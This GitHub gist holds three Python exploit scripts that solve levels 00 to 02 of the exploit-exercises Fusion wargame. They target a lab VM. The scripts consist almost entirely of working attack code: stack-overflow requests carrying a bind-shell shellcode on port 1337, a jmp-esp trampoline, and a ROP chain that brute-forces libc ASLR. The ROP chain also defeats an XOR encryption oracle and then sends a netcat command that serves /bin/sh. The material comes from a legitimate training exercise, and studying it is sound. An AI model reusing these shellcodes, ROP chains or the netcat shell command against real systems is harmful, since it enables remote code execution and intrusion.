Skip to content

Instantly share code, notes, and snippets.

@a0rtega
Created April 28, 2015 13:37
Show Gist options
  • Save a0rtega/34ac61e034c02fa46927 to your computer and use it in GitHub Desktop.
Save a0rtega/34ac61e034c02fa46927 to your computer and use it in GitHub Desktop.
exploit-exercises fusion level00 level01 level02
# Exploit for https://exploit-exercises.com/fusion/level00/
# a0rtega
from struct import pack
import socket
# Shell Bind TCP Shellcode Port 1337 - 89 bytes
shellcode = "\x6a\x66\x58\x6a\x01\x5b\x31\xf6\x56\x53\x6a\x02\x89\xe1\xcd\x80\x5f\x97\x93\xb0\x66\x56\x66\x68\x05\x39\x66\x53\x89\xe1\x6a\x10\x51\x57\x89\xe1\xcd\x80\xb0\x66\xb3\x04\x56\x57\x89\xe1\xcd\x80\xb0\x66\x43\x56\x56\x57\x89\xe1\xcd\x80\x59\x59\xb1\x02\x93\xb0\x3f\xcd\x80\x49\x79\xf9\xb0\x0b\x68\x2f\x2f\x73\x68\x68\x2f\x62\x69\x6e\x89\xe3\x41\x89\xca\xcd\x80"
overflow = "A"*139
#retuaddr = "BBBB"
retuaddr = pack("<L", 0xbffff8f8 + 157) # This address is leaked to us
request = "GET /" + overflow + retuaddr + " HTTP/1.1" + shellcode
s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
s.connect(("192.168.56.105", 20000))
s.sendall(request)
data = s.recv(1024)
data2 = s.recv(1024)
s.close()
print data
print data2
# Exploit for https://exploit-exercises.com/fusion/level01/
# a0rtega
from struct import pack
import socket
# Shell Bind TCP Shellcode Port 1337 - 89 bytes
shellcode = "\x90" * 128
shellcode += "\x6a\x66\x58\x6a\x01\x5b\x31\xf6\x56\x53\x6a\x02\x89\xe1\xcd\x80\x5f\x97\x93\xb0\x66\x56\x66\x68\x05\x39\x66\x53\x89\xe1\x6a\x10\x51\x57\x89\xe1\xcd\x80\xb0\x66\xb3\x04\x56\x57\x89\xe1\xcd\x80\xb0\x66\x43\x56\x56\x57\x89\xe1\xcd\x80\x59\x59\xb1\x02\x93\xb0\x3f\xcd\x80\x49\x79\xf9\xb0\x0b\x68\x2f\x2f\x73\x68\x68\x2f\x62\x69\x6e\x89\xe3\x41\x89\xca\xcd\x80"
overflow = "A"*15
overflow += pack("<L", 0x08049f4f); # jmp esp <- after add esp, 0x1c and pops, ret is this
overflow += "A"*118
overflow += "\xeb\x10" # jmp 0x12 <- this is to jump HTTP/1.1 after \x41 'nopsled'
retuaddr = pack("<L", 0x08049a29) # add esp, 0x1c ; pop ebx ; pop esi ; pop edi ; pop ebp ; ret
request = "GET /" + overflow + retuaddr + " HTTP/1.1" + shellcode
s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
s.connect(("192.168.56.105", 20001))
s.sendall(request)
data = s.recv(1024)
data2 = s.recv(1024)
s.close()
print data
print data2
# Exploit for https://exploit-exercises.com/fusion/level02/
# a0rtega
from struct import pack
import socket
import time
from itertools import cycle, izip
def xor_strings(s, k):
return "".join(chr(ord(c)^ord(k)) for c,k in izip(s, cycle(k)))
# libc ASLR ranges may not be very accurate
libc_base = 0xb7500000
while (libc_base < 0xb7900000):
print "Trying libc: 0x%x" % libc_base
s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
s.connect(("192.168.56.105", 20002))
# Header
data = s.recv(4096)
# nread(0, &op, sizeof(op));
s.send("E")
# nread(0, &sz, sizeof(sz));
s.send(pack("<I", 128))
# nread(0, buffer, sz);
s.send("A" * 128)
time.sleep(0.1)
# Header 2
data = s.recv(120)
# nwrite(1, &sz, sizeof(sz));
data = s.recv(5)
# nwrite(1, buffer, sz);
data = s.recv(128)
encryption_key = xor_strings(data[0:128], "A")
# nread(0, &op, sizeof(op));
s.send("E")
# ROPGadget to the rescue! :)
p = ''
p += pack('<I', libc_base+0x00001a9e) # pop edx ; ret
p += pack('<I', libc_base+0x00178020) # @ .data
p += pack('<I', libc_base+0x000238df) # pop eax ; ret
p += '/bin'
p += pack('<I', libc_base+0x0008c49c) # mov dword ptr [edx], eax ; ret
p += pack('<I', libc_base+0x00001a9e) # pop edx ; ret
p += pack('<I', libc_base+0x00178024) # @ .data + 4
p += pack('<I', libc_base+0x000238df) # pop eax ; ret
p += '//sh'
p += pack('<I', libc_base+0x0008c49c) # mov dword ptr [edx], eax ; ret
p += pack('<I', libc_base+0x00001a9e) # pop edx ; ret
p += pack('<I', libc_base+0x00178028) # @ .data + 8
p += pack('<I', libc_base+0x0002eb8f) # xor eax, eax ; ret
p += pack('<I', libc_base+0x0008c49c) # mov dword ptr [edx], eax ; ret
p += pack('<I', libc_base+0x00018f4e) # pop ebx ; ret
p += pack('<I', libc_base+0x00178020) # @ .data
p += pack('<I', libc_base+0x0002da2b) # pop ecx ; pop edx ; ret
p += pack('<I', libc_base+0x00178028) # @ .data + 8
p += pack('<I', libc_base+0x41414141) # padding
p += pack('<I', libc_base+0x00001a9e) # pop edx ; ret
p += pack('<I', libc_base+0x00178028) # @ .data + 8
p += pack('<I', libc_base+0x0002eb8f) # xor eax, eax ; ret
p += pack('<I', libc_base+0x00026722) # inc eax ; ret
p += pack('<I', libc_base+0x00026722) # inc eax ; ret
p += pack('<I', libc_base+0x00026722) # inc eax ; ret
p += pack('<I', libc_base+0x00026722) # inc eax ; ret
p += pack('<I', libc_base+0x00026722) # inc eax ; ret
p += pack('<I', libc_base+0x00026722) # inc eax ; ret
p += pack('<I', libc_base+0x00026722) # inc eax ; ret
p += pack('<I', libc_base+0x00026722) # inc eax ; ret
p += pack('<I', libc_base+0x00026722) # inc eax ; ret
p += pack('<I', libc_base+0x00026722) # inc eax ; ret
p += pack('<I', libc_base+0x00026722) # inc eax ; ret
p += pack('<I', libc_base+0x0002dd35) # int 0x80
# nread(0, &sz, sizeof(sz));
s.send(pack("<I", (4096 * 32) + 16 + len(p)))
# nread(0, buffer, sz);
#s.send(xor_strings("A" * ((4096 * 32) + 16) + "BBBB", encryption_key))
s.send(xor_strings("A" * ((4096 * 32) + 16) + p, encryption_key))
time.sleep(0.1)
data = s.recv(5)
data = s.recv((4096 * 32) + 16 + len(p))
s.send("Q")
s.send("/bin/nc.traditional -lp1337 -e/bin/sh\n")
s.close()
libc_base += 0x1000
Sign up for free to join this conversation on GitHub. Already have an account? Sign in to comment